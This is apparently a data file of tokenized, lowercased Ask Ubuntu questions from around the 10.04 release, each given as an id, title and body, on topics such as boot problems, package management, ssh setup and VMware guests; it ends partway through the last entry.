1993	looking for caps lock/num lock and hdd activity indicators	i 've purchased a dell inspiron 1545 for my wife . due to some really bad judgement from the design team , the only indicator you have is the power one . what do you guys recommend in terms of having some nice indicators for caps/num lock and hdd activity ? i just feel so lost without some quick visual clue on those items .
2007	how do i change the plymouth bootscreen ?	with regards to plymouth -- are there alternative boot screens available ? what 's the easiest way to change the boot screen ?
2013	stuck at boot time in the splash screen prior to gui login dialog	this is an issue i 've been facing for a long time . however i am still able to use my ubuntu via recovery mode , where i log-in to the shell , where i type startx . sometimes when i restart , it goes in clean . but most of the time i get hung up with the splash screen . wondering if this is an issue with mount : heard that ubuntu will check the hdd once after every 30 mounts . i seem to notice it has not being doing that for a while .
2014	how do i remove an application ?	how do i remove an app ( tonido ) in ubuntu ?
2018	what spam filter should i use with evolution : bogofilter or spamassasin ?	the ubuntu standard mail client evolution provides two plugins for spam filtering : bogofilter spamasassin what is the difference ? are there any advantages / disadvantages ( speed / accuracy / ... ) ? note : i 'm mainly interested in `` out-of-the-box '' performance , not in advanced configuration of either of the spam filters .
2021	is there a way to manage my grub menu options from with the gui/desktop ?	with each kernel update , a new entry is placed in grub to provide a way to boot that specific kernel version . i have about 5 at the moment and , to be honest , once i have confirmed i can boot into the new kernel version , i never go back to a previous version . i 'd like to manage the items in this list from the desktop rather than edit the file , is there a way to do this using the gui from within ubuntu itself ?
2028	how can i troubleshoot the lack of detection of the d-link dwm-152 ( hsdpa usb modem ) ?	i just installed ubuntu 10.04 lts . however , my d-link dwm-152 ( hsdpa usb modem ) is not able to be detected . i am having exactly same result as c_siswan http : //ubuntuforums.org/showthread.php ? t=1476983 can anyone suggest me a solution ?
2033	are there anywhere instructions explaining how to troubleshoot sound problems on the ubuntu desktops ?	i would like to have a general list of steps i can do to troubleshoot problems with sound .
2034	how can i hide directories without changing their names ?	the ocd in me wants directories i do not like the name of to be hidden since i do not interact with them directly . how can i hide directories without using the dot notation ?
2035	how can i make non-kde/non-qt application started with root privileges look integrated into my kde desktop ?	i have a desktop that has both gnome and kde installed . when i start non-kde applications under my user account running kde , the application widgets obtain the same window decoration , style etc as my kde applications . however , when i have to start an application with root privileges ( i.e . via kdesudo ) , the style is like gnome , not like kde . what do i need to do to change this ?
2038	backup software sources	in ubuntu 10.04 , when i goto system > administration > software sources and goto the authentication tab , i can view all of my keys allowing me to download from third party sources . how would i back this up to copy all of my sources and keys to a new system ?
2045	how to determine where biggest files/directories on my system are stored ?	i was wondering how do you know where the largest files in my system are stored . for example -- - disk space used : 1gb java : 500mb java percentage : 50 % maybe represented in a pie chart . maybe ? i know this maybe a feature overkill . i sometimes forget having stored things and wonder why my disk is so full . so basically a command that will allow me to run on the file system and provide me with information on disk space used . please and thank you .
2048	what is the difference between running vms and a ubuntu ec2 cloud ?	does it make sense to run a cloud on only one server ? if so what are the benefits ? are there any nice tools managing my vms ( apart from virt-manager ) even if i do not use the ec2 cloud ?
2053	'installing ' applications , where to put folders ?	i 've just bought a game ( machinarium ) which does not come with a deb file neither is it a ./configure , make etc type of application . i can just run it . where is the best place to put it so i can create a launcher and keep it out of my home directory ? i.e . i 'm basically asking where are applications are installed and should i put this game there . thanks !
2054	why wo n't xfs_check run ?	i 'm running a fully updated ubuntu 9.04 `` jaunty '' i686 server . i have an single xfs volume in an lvm group called /dev/mapper/vg0-bigthree . if i boot to single user mode and ensure that the volume is unmounted , i still get the following every time i try to run xfs_check : $ sudo xfs_check /dev/mapper/vg0-bigthree xfs_check : /dev/mapper/vg0-bigthree contains a mounted and writable filesystem fatal error -- could n't initialize xfs library just to be thorough , i started by trying to run $ sudo fsck.xfs /dev/mapper/vg0-bigthree if you wish to check the consistency of an xfs filesystem or repair a damaged filesystem , see xfs_check ( 8 ) and xfs_repair ( 8 ) . before turning to xfs_check .
2057	how can i install different icons ?	i often find myself seeing new icons but i am unable to install them . how do you install icons on ubuntu ? can someone break down the process for me ?
2058	creating a launcher ( for mechinarium )	i 'm trying to make a launcher for mechinarium , its a flash game with a launcher that runs flash files in separate folders in its directory as far as im aware . i 've tried to make a launcher which points towards this executable which runs fine when i click on it . when i try and run it from the launcher the player comes up ( black screen ) and i can right click and get the flash options however the game does not load . any ideas ? thanks . edit - answer : http : //machinarium.net/forum/index.php/topic,467.0.html
2064	how to only perform lts upgrades ?	i know i 've seen this documented somewhere before , but what 's the option to keep update-manager from prompting for updates except for lts-to-lts releases ?
2070	how to force panel not to be on top ?	i am trying to present a full screen slideshow using ooo impress , but the top panel stays on top of the slideshow . i went to slideshow- > slideshow settings ... and made sure always on top was checked . how can i fix this ?
2071	dropbox reconnect on network connection established	i am running unr ( but using the regular gnome launcher ) and have dropbox installed . since i use my laptop on the train , there is no network connectivity . however once i reconnect to a network , dropbox seems to be completely unresponsive to the fact that there is a network connection and has to be restarted ( which means lots of hard drive scanning , battery usage , slowdowns , etc ) . is there a way to get dropbox to reconnect automatically , or gota wait for a patch ? edit : nothing special about my network configuration , pretty much out-of-the-box . note that most of the time i connect to wifi not cable . but the problem does not change in either case . and i forgot to mention , i usually put my computer to sleep/hibernate in between leaving home and using it on the train so it `` loses '' or `` gains '' connection on waking up . more edit : i just had the problem happening again . basically it has a network cable plugged in . goes to sleep . on wakeup ( cable still plugged in ) dropbox is stuck at `` connecting '' .
2073	firefox slow performance	i have to say , firefox on ubuntu 's performance is attrocious . very quickly it gets into 100 % cpu use ( thank god i have multiple cores ) and hundreds of megs of ram . even closing tabs does not help the issue ( unless google.com uses supreme amounts of javascript ) . on the same machine chromium browser runs lightning smooth . i tried swiftfox , nothing useful there . is this a common problem ? only recent ( past 3.6 ) versions have even been able to scroll rather smoothly vs choppy performance when using the scroll bar on pages . the performance is getting close to running firefox on a windows xp virtual box vm . edit : os : kubuntu 9.10 . installed gnome packages for ubuntu and use those . upgraded to 10.04 . 64bit nvidia proprietary video drivers using the restricted driver tool . hardware : core 2 quad 4gb ddr2 667 ram 7200rpm hdd nvidia geforce 8800 also note for everyone responding : the default settings work damn well in windows on the same machine . the performance in linux is what sucks .
2075	what 's the difference between `` service '' and `` /etc/init.d/ '' ?	i 've been managing server installations both on and off ubuntu flavor for some time - i 've become quite adjusted to /etc/init.d/ for restarting servcies . now i get this message : root @ tatooine : ~ # /etc/init.d/mysql status rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service mysql status since the script you are attempting to invoke has been converted to an upstart job , you may also use the status ( 8 ) utility , e.g . status mysql mysql start/running , process 14048 this seems to have been brought about in the latest lts of ubuntu - why ? what 's so bad about /etc/init.d/ and what/is there a difference between service and /etc/init.d/ ?
2076	what is the best way to convert or copy an vm image into an lvm ?	i have a couple of vms running on images instead of lvms . i am not concerned about downtime but just about convenience of the process .
2081	unable to switch between windows	i recently upgraded to 10.04 . before the upgrade , i was using multiple windows , and i was able to drag applications across the windows . but , now the windows are locked . further , the icon of the maximized window is not showing . just a generic window icon .
2093	how to install gui desktop on a server ?	after installing ubuntu server how do i install the desktop environment ?
2099	is it worth to tune ext4 with noatime ?	with previous versions of ubuntu ( using ext3 filesystem ) i used to tune it for better performance with noticeable results by setting the noatime parameter in /etc/fstab . is it still worth it to do that with the ext4 filesystem , which is now default in ubuntu ? if so , does the procedure changed in some way ? an example of this tuning can be found here .
2103	installation : troubleshooting webmin dependencies	i am having a dependency problem dpkg installing webmin 1.510 ( deb ) package on ubuntu 10.04 , as seen in the screenshot . i do not know where to look to find info about what dependencies are needed .
2109	finding the file system explorer application in a default desktop install ?	simple question : i 'm new to ubuntu in general ( using 10.04 ) and from the default ubuntu desktop after a default ubuntu desktop install , can not find the file system explorer program in the top application menu . update : i want to see the complete file system , not just my documents , my pics , etc . i know it 's got ta ' be there , but maybe i do n't recognize the name ( because i come from the windows world ) .. so i think this is going to be a race to first post : )
2110	where 's the best place to share files from ?	i 've got samba installed on ubuntu 10.04 and am about to configure it using webmin , but i just realized i do n't know the best place to create a file share on a linux system . i want to use best practice as to not accidentally create a security risk or put a share in an unconventional place where an experienced linux user would have a hard time finding it . basically i want to transfer some general files ( pics , docs , etc ) back and forth between a ubuntu file share ( placement tbd ) and a windows machine .
2115	what 's lost+found and where did it come from ?	i reformatted a hard drive to ext4 , planning to use it as a backup drive . after mounting the freshly-formatted drive , i discovered a single empty directory inside it : lost+found . what 's the purpose of this mysterious directory ?
2118	how to install an rpm using a gui tool in ubuntu desktop ?	i 've been given some rpm files on cd and want to install them in ubuntu ( 10.04 ) desktop using a gui app . is there a way for me to do this without resorting to the command line ? i 'd like to know what gui app to use , and also how to install an rpm with it .
2126	why does the mount point keeps changing , and how can i prevent it ?	when i plug in an external usb drive , it automatically mounts and it 's accesible in /media/disk/ however after a while , this is how my /media directory looks like : cesar @ minas-tirith : ~ $ ls /media/ 0bc7-569e 0bc7-569e_ disk disk_ disk__ disk___ as you can see , the disk entry is repeated with additional _ appended at the end . i do n't know why this happens , but i can imagine that under some circumstances , the system ca n't mount the disk in /media/disk/ and creates disk_ , then it ca n't mount it in /media/disk_ and creates disk__ and so forth . the other entry 0bc7-569e i think it 's from a sd media card so it 's not only for usb drives . i would like to know what is causing this ? is this expected behavior ? or how can i prevent this from happening ?
2127	change web browser shown in the ubuntu desktop application launcher ?	i 'd like to change the web browser shown on the application launcher , from firefox to chrome . this setting obviously differs from the default web browser known to the system because i already set chrome as the default and it launches links instead of firefox .
2130	what is utnubu ?	not ubuntu , i heard it on planet ubuntu but google does n't tell me anything . it is something related to debian .
2134	what are some commercial apps for ubuntu ?	anything including games and obscure software
2140	is there a way to turn gvim into fullscreen mode ?	is there a way to turn gvim into fullscreen mode ? i know that this is possible on os x through macvim , but was n't able to find a way to do it on ubuntu .
2145	how can i use pulseaudio over ssh ?	i 'd like to listen to music on my home server from work . both are ubuntu boxes running pulseaudio . it seems from researching that applications communicate to the pa server via tcp on port 4317 , so i figured it should be as easy as : me @ work : ssh -yr 4317 : localhost:4317 me @ home at this point i can run rhythmbox from the ssh session with x11 forwarding , and i assumed rhythmbox would be transparently talking to pulseaudio over the reverse tunnel , resulting in the music playing on my work machine . however instead it appears that the music still plays on my home computer . i 've tried messing around with pulse_server as well to no avail . has anyone accomplished something similar ? it seems like this should be relatively simple due to pulseaudio 's design . i 've played around with mounting my music library via sshfs instead but i 'd really like to have one set of metadata/app settings/playlists and such . thanks for any tips !
2146	how can i boot from a 16 gb pendrive with some old bios ?	i need to boot ubuntu in a computer ( computer a ) with no cd . i have a 16 gb pendrive with a live ubuntu version . the pendrive works in at least two newer computers . computer a boots from a 2gb pendrive right . so it 's likely a bios issue . but it 's quite inconvenient to always carry two pendrives , how can i made the older computer boot from the bigger drive ? . notes : repartitioning the drive does n't seen to work . i noticed than the 16 gb pendrive is seen like a external zip drive by the bios , while the smaller one is seen as a hard disk . likely related .
2147	is it possible to find out which files are deleted during a filesystem recovery check ?	some files/inodes are deleted during filesystem check if corrupted in a way after a system crash . fsck only reports `` some inodes were deleted '' . is it possible to know exactly what files were deleted and how to recover them ?
2150	accessing a specific url with firefox 3.6 on ubuntu 10.4 crashed the os , how should i debug this ?	the system is a spare dell 2400 i wiped clean , with ubuntu 10.4 installed . update manager has everything current , and i have n't been mucking with drivers or tricky system settings . in fact , it has been a stable and friendly system to install and use . so imagine my surprise when browsing to http : //element-14.com/ ( an otherwise useful community site for electronic engineering types ) followed a redirect or two , then black screen , then the i 'm starting up tune with the pink hazy smoke and nothing further works . the keyboard is crashed hard , and the alt-sysrq key combos do nothing . more than just firefox and the x server are crashing . i repeated the crash with an ssh session open , and not only did the connection get taken down , but it no longer responded to attempts to get a fresh connection . i tried enabling apport , in hopes that it would notice something and help identify the culprit , but it seems to be oblivious to the crash . each time , i 've had to lean on the power button to reboot . google searches hint that there are issues with the particular intel chipset providing the vga on its motherboard . i 'm looking for advice about how to proceed with debugging this kind of crash . any ideas ? update : i tried following advice to try setting up the netconsole kernel module and a matching netcat instance to receive the log . i set up netcat on my xp box , used alt-sysrq-s to verify it could receive kernel messages , then browsed to the site . only two printk ( ) s were logged : [ 251728.009794 ] i915 : unknown parameter `modset' [ 251728.051420 ] i915 : unknown parameter `modset' hmm . perhaps my video driver is misconfigured ? especially since i see these same messages in the output of dmesg just after booting . at least this time i explicitly synced my disks before deliberately crashing the system . for the record , lspci -nn | grep vga says : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 82845g/gl [ brookdale-g ] /ge chipset integrated graphics device [ 8086:2562 ] ( rev 01 ) update : solved ! ! ! the hint to use netconsole led to an epiphany . googling around the phrase `` i915 unknown parameter modset '' suddenly led me to trip over the root cause . the name of the option to the i915 driver is modeset not modset . i changed /etc/modprobe.d/i915.conf to have the correct spelling , rebooted , and now i can access element-14 ( and presumably other sites that do whatever it is that element-14 does that triggers the bug in the video driver ) without an unpleasant forced reboot . this leaves behind the ( apparently well known ) issue that the i915 driver lacks quality , especially on older chipsets . apparently the kernel mode setting feature is particularly deficient . without the option spelled correctly , it defaulted to kms enabled , and also crashed . with it spelled correctly , kms is disabled , and the driver survives whatever content was triggering the crash . also , there are a number of bug pages at launchpad and other community sites that have the wrong spelling of the option name . i strongly suspect that is where i got the spelling i used . edit : i 've copied the relevant solution to an actual answer , and improved my description of it here .
2151	is there a evernote client ?	evernote is a cool site for capturing note , tagging it and retrieving it from everywhere . the web application is nice but i was wondering if anyone knows about a standalone version such as for windows , android , ... but for ubuntu ? thanks !
2153	gnome-terminal shortcut open multiple ssh connections in tabs	i was wondering does anyone know a way to make some kind of shortcut under ubuntu that when i click on it , it will open up multiple ssh sessions ( or execute other actions ) in a tabbed gnome-terminal ?
2154	configuring gpg in kmail	having done a fresh install i need to set this up again . we could do with an up to date guide . this might encourage more people to use encryption and signing . i already have a keyring , but others need to know how to do that . that should probably be a separate question . i use kgpg to manage my keys . in kmail i know you need to set the default signing and encryption keys on your identity . when i try to sign an email it complains that signing failed without asking for my pass-phrase . what am i missing ? how should i configure cryptography in kmail ?
2160	child-proofing an account	i 'd like to make an account for my daughter in which : only the applications menu is shown . maybe places . definitely no system . the applications menu only shows the applications i choose for her ( games , education , etc . ) there 's no internet connection
2163	nano syntax highlighting for c # and/or asp.net	has anyone got ( or can point in the direction of ) a nanorc file that contains syntax highlighting for c # and/or asp.net ?
2167	how to build application without sudo privileges ?	what do i need to setup on a ubuntu 9.10 server so that a user can build applications of there choice ( i.e . ./configure , make & & make install ) with out the need for sudo/admin privileges . i just feel its a bit of a security risk having to give a user access to parts of the system they might not need in order to build a app .
2177	how do i use ext3cow ?	a while ago i looked at the ext3cow file system . i am interested in getting it running under lucid . i was wondering whether anyone had successfully set it up on their system and could offer any tips ? i have had a quick google around but not found any mentions of getting it working under ubuntu . http : //www.ext3cow.com/
2182	how can i disable the auto-play feature when mtp device is connected ?	currently whenever i connect an mtp device ( my creative zen , or blackberry ) rythmbox automatically tries to mount it as a music device and opens up . i just want to be able to connect my device to the usb for charging without having windows popup every time i do . how can i disable this `` autoplay '' feature ?
2186	replace grep command with grep -n -- colour ?	because i 'm lazy ... . any time i want to use grep , i want it to be grep -n -- colour . is there a way to permanantly map this ?
2194	how can i improve overall system performance ?	what are your tips for improving overall system performance on ubuntu ? inspired by this question i realized that some default settings may be rather conservative on ubuntu and that it 's possible to tweak it with little or no risk if you wish to make it faster . this is not meant to be application specific ( e.g . make firefox load pages faster ) , but system wide . preferably 1 tip per answer , with enough detail for people to implement it . a couple of mine would be : install preload ( via software center or sudo apt-get install preload ) ; change swappiness value - `` which controls the degree to which the kernel prefers to swap when it tries to free memory '' ; what are yours ? ps : since this is not intended to have a unique answer but rather , several useful tips , i 'm making this community wiki out-of-the-box .
2198	how can i make gnome-terminal not transparent ?	when i use gnome-terminal the background is annoyingly slightly-transparent . here you can read the ubuntu.stackexchange.com site through the background . these are the background options i have , which are set to `` not transparent '' . i have the desktop visual effects set to `` normal '' . changing them to none removes the problem , but obviously i lose out on visual effects like window previews , drop shadows , nicer transitions , etc . any ideas how to make this background truly solid while keeping normal visual effects ?
2199	customize software sources for ubuntu desktop updater to manage ?	i love the software updater in ubuntu desktop and want to configure underlying package managers with other sources of software . sometimes i run into a new software project that is n't delivered through the updater . i install the software outside the updater but i know there 's some way to tell the updater to monitor it for updates . looking for leads on where to find the best info ( for a newbie ) to customize the sources of software updating in ubuntu desktop .
2206	using ubuntu with a two-screen setup	i have to install ubuntu on a two-screen setup . how should i do that and what are some specific things that i should keep in mind while doing it . will it break anything ? i use an ati graphics card
2209	preventing video playing lag in flash	i have just installed ubuntu for a friend . he uses 32 bit . when he views youtube videos full-screen there is a kind of lag . he is using an ati 1 gb graphics card . this does n't happen when he is not in full screen mode . is there any workaround to prevent this ?
2212	player for internet radio	i used mplayer -options url : //to/radiostation to listen to internet radio for some time . however i 'd like to use another software for this . what do you use and what do you consider the advantages of this software ?
2214	how do i add a user to the `` sudo '' group ?	in /etc/sudoers i see this : # allow members of group sudo to execute any command after they have # provided their password # ( note that later entries override this , so you might need to move # it further down ) % sudo all= ( all ) all so how do i add a user to that sudo group ?
2216	ca n't launch eclipse	i 've been using eclipse for quite a while . i just switched from openjdk to sunjdk . i went back to using eclipse , it opened just fine . i added some libraries to my build path of a project , but the error checker was still saying i did n't have it . so i decided to restart eclipse . after than i ca n't start eclipse . it does n't give any errors or anything . if i launch it from the command line , it does n't do anything : joel @ joel-laptop : ~ $ eclipse joel @ joel-laptop : ~ $ it never pops up the choose workbench dialog or anything . has anyone heard of this ? i 'm using the latest version from the ubuntu repos . i 've tried restarting my machine and reinstalling eclipse . nothing .
2219	how do i clear the dns cache ?	i just updated the dns record ( ns1 , ns2 , ns3.myhostingcompany.com ) for a site i 've got hosted , but i still get the domain registrar parking page . i 'd like to see if the problem is ubuntu 's cached dns records . is there a way to clear ubuntu 's dns cache ? ( if such a thing exists ? )
2226	what exactly is in ubuntu-desktop ?	i 'm also interested in its variants , like kubuntu-desktop . it appears to include gnome ( or kde ) and a bunch of other things . but it 's quite large - is there a breakdown of what is included in ubuntu-desktop and exactly what those items are/do ?
2235	how to make hibernate/sleep work on laptops where default setup is n't working ?	i have an asus r1f laptop . for some reason , hibernate/sleep is n't working properly at all . are there any other packages i can use or tweaks i can implement to get this working ? i 've googled around and this appears to be an issue with some laptops and their need for proprietary drivers . is this true ? is there anything i can do ?
2236	icons on menus have disappeared	when i right click to bring up a menu , for example on the desktop , i have 'open terminal here ' which i know should have a terminal icon next to this however it does n't . any ideas ? i had a poke around in gconf-editor but did n't have much luck ( though i did n't try very hard ; ) thanks
2238	how can i start my own repository	i 'm an avid developer but i never actually gotten around to setting up my own ppa - how would someone go about this ? common issues encountered ? how do i get my source code to be compiled into packages on the ppa ?
2243	ccleaner equivalent ?	i frequently use ccleaner to ( cover my tracks ) , clean up unused data stored on my computer from web traffic and hotfixes on my windows system . i was wondering if there is a piece of software that does the same thing for ubuntu that ccleaner does for windows ? please and thank you .
2246	wake from hibernate on ssh request	is there a feature ( or aptitude package ) in ubuntu 10.04 that will wake my computer up from standby when it gets an ssh ( or other webrequest ) . i 've been trying to put my computer in hibernate/standby when i 'm not running code in an effort to `` go green '' at my university . however , i often need to ssh into my computer over the weekend to do work . however , it does not seem to `` wake-up '' to hear this request . i remember on my old windows machine there was a `` wake-on-lan '' option to the hibernate command . so if i needed to remote-desktop in while it was asleep it would wake up . can anyone request a good way to replicate this feature ? thanks , will
2251	automatic logoff	i had a problem with my ubuntu 10.04 that automatically log off while working , even i working with excel its automatically log off and returned to login screen , i checked it all the power settings and updated all it to never.also i disabled screen saver.in some forums they are telling that keystroke is enabled in your keyboard thats why your facing this , but i do n't know where it is ... . i think the problem will be small , but i do n't know where the problem is ... ... ... anybody help me to solve this problem , awaiting for answer ... ... ... ...
2254	how to update mod_wsgi to latest version on ubuntu 10.04 ?	my ubuntu server has this version installed : # dpkg -l | grep wsgi ii libapache2-mod-wsgi 2.8-2ubuntu1 python wsgi adapter module for apache how can i get the latest version 3.3 ?
2256	view or convert mdi file	i have some insurance files that i need to be able to view , but they are in the mdi format i ca n't get them to work at all in ubuntu . i 've searched the entire forum and i 've even installed microsoft office 2003 & 2007 through wine , but it still does n't work correctly . the only solutions posted in the forum have suggested getting an mdi to pdf converter or installing ms office . i have n't gotten any of this to work . how can i view or convert mdi files ?
2258	keyboard/mouse not recognised during installation	i have a logitech mx5000 keyboard/mouse combo . i 'm using the logitech bluetooth dongle , and i use it in usb emulation mode ( not native bluetooth ) . i tried to install ubuntu 10.04 using wubi . after the ubuntu setup started natively , the keyboard and mouse refuse to work . i have no other keyboards or mice around . i tried unplugging and re-plugging the usb dongle to make sure it 's in usb mode and not bluetooth , but when i do that the keyboard refuses to re-pair with the dongle ( using the connect buttons ) . rebooting into windows 7 and the keyboard/mouse instantly come back . any ideas how i can get ubuntu 10.04 installed ?
2261	how are administrators supposed to read root 's mail ?	what is the ubuntu way for system administrators to receive system notifications , which typically take the form of e-mail sent to the root account ? examples of such notifications are the output of cron jobs , or degraded raid notifications . on a pretty much default ubuntu 10.04 installation , i ca n't find any way that anything happens to root 's mail other than being deposited in /var/mail/root . how are users supposed to 1. discover it and 2. read it as it arrives ? i observe that on a warty , the installer added root : myusername to /etc/aliases . so back then the user who installed the system if ( s ) he read the local mail . so there seems to have been a regression somewhere along the way . still this was not a complete solution , because ubuntu users ca n't be expected to be aware that they have local mail and should set up their mail client to read it . added : given current replies , a server user should be able to cope , provided he 's aware of the issue . fair enough . but consider j . random desktop user , who does n't know how to use a command line , and only knows how to click the mailbox icon to read his mail . how can he be notified that his system wants to tell him something ? ( allow a one-time intervention by a more competent user if that 's unavoidable . )
2263	chkconfig alternative for ubuntu server ?	i 've become very accustomed to managing service startups on redhat/rhel platforms using chkconfig though that does n't appear to be the debian/ubuntu way - how do i update runlevel information for system services on ubuntu ? ultimately looking for the equivalents of : chkconfig -- add < service > chkconfig -- level 345 < service > on chkconfig -- del < service >
2266	how to set up an ubuntu 10.04 machine to accept ssh requests only from within the local network ?	i am about to install 10.04 ( from bare metal to replace 9.04 ) and i want to set it up so that i can shh into the machine , but only from other machines on my local network . ( i.e. , i want to reject all ssh attempts from other than 192.168.1 set of ips . ) how do i do that correctly on 10.04 ?
2271	how to harden an ssh server ?	what measures can/should i take to make sure that security around my ssh server is absolutely impermeable ? this will be community wiki from the start , so lets see what people does to secure their servers .
2276	how to setup a machine to host my websites to the world - with my own url ?	i have been playing around with my blog , alot . i have couple of old computers laying around i want to put to use . i was wondering if there is a way to setup a server , then will be linked to a url that i buy and server pages and maybe even install wordpress . any information on setting that up on ubuntu 10.04 desktop would be amazing . please and thank you .
2280	selective mounted volumes for the gnome desktop and nautilus sidebar	by default 'mounted volumes ' are shown on the ubuntu desktop . i usually disable this ( gconf-editor or ubuntu tweak ) because i do n't want , for instance , my windows partition on the desktop . however this would be a useful to display usb flash data sticks or memory cards , which are not permanently mounted volumes . so is there some way to be selective about which volumes are shown on the desktop ? ( image : three mounted volumes i do n't want , and one usb flash data stick i do )
2281	conky guides ( links )	i want to take a stab at creating my own layouts for conky , but i 'm having trouble finding any recent guides . if you know of any , i would be grateful if you could post some links .
2283	can i set the power indicator to show battery percentage instead of time remaining ?	it 's great that the indicator applet tells me i have 2 hours and 12 minutes of battery left , or that it will be charged in 1 hour 8 minutes , but i might well change my pattern of usage during that time and am frankly not confused by percentages . how do i make the applet show a percentage charged or discharged instead ?
2290	ca n't get hp officejet 6500 card reader to work	this network ( wired ) printer works great using the latest hplip drivers . however when i plug in an sd card , it just blinks and never shows up mounted anywhere . has anyone come up with a way to mount these ? i 'm using lucid , 10.04. re : version , hp-info says xxxxx @ lucid : ~ $ hp-info hp linux imaging and printing system ( ver . 3.10.5 ) device information utility ver . 5.2 copyright ( c ) 2001-9 hewlett-packard development company , lp this software comes with absolutely no warranty . this is free software , and you are welcome to distribute it under certain conditions . see copying file for more details . using device : hp : /net/officejet_6500_e709a ? zc=hp05857e
2294	how to fix a package manager error in notification area after upgrading a fresh install of lucid with a '/home ' from jaunty ?	i just installed 10.04 , and used manual partitioning to preserve my '/home ' from a 9.04 install . ( to be clear : i did not upgraded 9.04 to 10.04 , but installed 10.04 off a of cd , keeping only my '/home ' . ) after the sucessful 10.04 install , i used synaptic to apply all updates , rebooted , removed some packages ( mostly tomboy and bluetooth ) , rebooted , and then used synaptic to install tonnes of packages , mostly from lucid/main and lucid-updates/main , though i also did install a number from lucid/universe and lucid-updates/universe . a minute or so after the mass installation of new packages , a red circular icon with a white bar running horizontally through it appeared in my notification area . ( the icon is quite like the `` do not enter this road '' sign pictured here . ) on hovering my mouse over the icon , i get the following message : an error occurred , please run package manager from the right-click menu or apt-get in a terminal to see what is wrong . the error message was : 'unknown error : '' ( e : opening configuration file /etc/apt/apt.conf.d/99synaptic - ifstream : :ifstream ( 13 : permission denied ) ) ' this usually means that your installed packages have unmet dependencies ( since there was no way to copy the text , i transcribed it ; it is n't impossible that it is not a completely faithful transcription . ) i then ran the following commands : sudo apt-get check sudo apt-get clean sudo apt-get autoclean sudo apt-get autoremove and then ran those same commands ( in that order ) but also with the -f flag . i then rebooted . this has n't removed the warning icon from the notification area . so , i am at a loss for how to proceed . [ snip a lot of detail about what packages i 'd installed and removed that turned out not to be relevant at all . ]
2299	simple twitter client to post all text entry	this is a bit of a weird question , and i do n't even know if it belongs here or not . i want to set up a ubuntu box with a keyboard and a twitter program , so that everything that is typed into the keyboard is posted on twitter . so what i am looking for is a simple twitter client that will force all input via keyboard into a tweet and post to twitter after 140 chars , after the enter key , and/or a time period . basically what i am planning is a little experiment to leave a keyboard somewhere it can be typed on and played with , and post all text entry through to twitter automatically . the alternative is to simply save all entered text to a file , but i would prefer the twitter approach . does anyone have any ideas if there is a program/script out there that will do this for me ? i am mainly looking for a command line script , as gui programs are easier to exit or lose focus than a command line .
2300	vlc - scroll wheel does n't change volume level	i 'm having trouble with vlc , when i try and adjust the volume with my scroll wheel it does n't change the volume , in settings x-axis control is set to volume control so i ca n't understand why it wont work any ideas ? cheers
2301	randomly freezes - how can i diagnose the problem ?	at random times , ubuntu 10.04 freezes , and i have to do a hard shutdown . it was upgraded from 9.10 which did n't freeze . first , is this is common problem with a quick answer , and if not , what can i do to diagnose it ? i 've tried checking application/kernel logs , but nothing gives me a clue as to what caused the problem . my guess , is that since the os froze , no logs could be updated . ideas ?
2314	guest resizing ubuntu 10.04 64-bit in vmware player not working	background i 'm running ubuntu as a guest os in a vm . originally the vm was created with ubuntu 9.10 64-bit and with vmware-tools installed , when i resized or maximized the vmware player , the guest os was correctly and automatically resized . once i upgraded to ubuntu 10.04 ( not reinstalled ) , automatic resizing no longer works . however , the mouse and network drivers do continue to operate properly . when installing vmware-tools in 10.04 , i notice a lot of lsb warnings for upstart jobs that were not thrown when installing it in 9.10 . environment distro : ubuntu 10.04 64-bit kernel : linux nitrogen 2.6.32-24-generic # 39-ubuntu smp wed jul 28 05:14:15 utc 2010 x86_64 gnu/linux vmware player : 3.0.1 build-227600 host os : windows 7 home 64-bit what i 've already tried : reinstalling vmware-tools updating to the latest patch level of vmware player 3.0.1 updating all installed ubuntu packages , including kernel ( and then re-install vmware-tools ) manually creating entries in xorg.conf for the host 's fullscreen resolution problem when i resize or maximize the vmware player window , the guest os size stays fixed . question how do you configure vmware-tools for vmware player 3.0.1 in ubuntu 10.04 64-bit to enable automatic guest resizing ? update i do n't know exactly why this fixed my issue , but on aug 28th , 2010 a set of package updates came out that ( see below ) , after installation , magically resolved this issue . i 'm guessing it has something to do with the xorg packages . start-date : 2010-08-28 08:05:49 install : ttf-dejavu-extra ( 2.30-2 ) upgrade : libsmbclient ( 3.4.7~dfsg-1ubuntu3 , 3.4.7~dfsg-1ubuntu3.1 ) , language-pack-gnome-en-base ( 10.04+20100422 , 10.04+20100714 ) , libkpathsea5 ( 2009-5ubuntu0.1 , 2009-5ubuntu0.2 ) , smbclient ( 3.4.7~dfsg-1ubuntu3 , 3.4.7~dfsg-1ubuntu3.1 ) , linux-image-2.6.32-24-generic ( 2.6.32-24.39 , 2.6.32-24.41 ) , ubufox ( 0.9~rc2-0ubuntu2 , 0.9~rc2-0ubuntu2.1 ) , language-pack-gnome-en ( 10.04+20100422 , 10.04+20100714 ) , xserver-xorg-core ( 1.7.6-2ubuntu7.2 , 1.7.6-2ubuntu7.3 ) , ghostscript-cups ( 8.71.dfsg.1-0ubuntu5.2 , 8.71.dfsg.1-0ubuntu5.3 ) , xserver-common ( 1.7.6-2ubuntu7.2 , 1.7.6-2ubuntu7.3 ) , libwbclient0 ( 3.4.7~dfsg-1ubuntu3 , 3.4.7~dfsg-1ubuntu3.1 ) , icedtea-6-jre-cacao ( 6b18-1.8-4ubuntu3 , 6b18-1.8.1-0ubuntu1 ) , linux-headers-2.6.32-24-generic ( 2.6.32-24.39 , 2.6.32-24.41 ) , openjdk-6-jre-lib ( 6b18-1.8-4ubuntu3 , 6b18-1.8.1-0ubuntu1 ) , libfreetype6 ( 2.3.11-1ubuntu2.1 , 2.3.11-1ubuntu2.2 ) , openjdk-6-jre-headless ( 6b18-1.8-4ubuntu3 , 6b18-1.8.1-0ubuntu1 ) , samba-common ( 3.4.7~dfsg-1ubuntu3 , 3.4.7~dfsg-1ubuntu3.1 ) , linux-headers-2.6.32-24 ( 2.6.32-24.39 , 2.6.32-24.41 ) , ifupdown ( 0.6.8ubuntu29 , 0.6.8ubuntu29.1 ) , tzdata-java ( 2010k-0ubuntu0.10.04 , 2010l-0ubuntu0.10.04 ) , libdjvulibre21 ( 3.5.22-1ubuntu4 , 3.5.22-1ubuntu4.1 ) , ghostscript-x ( 8.71.dfsg.1-0ubuntu5.2 , 8.71.dfsg.1-0ubuntu5.3 ) , libservlet2.5-java ( 6.0.24-2ubuntu1.2 , 6.0.24-2ubuntu1.3 ) , libgs8 ( 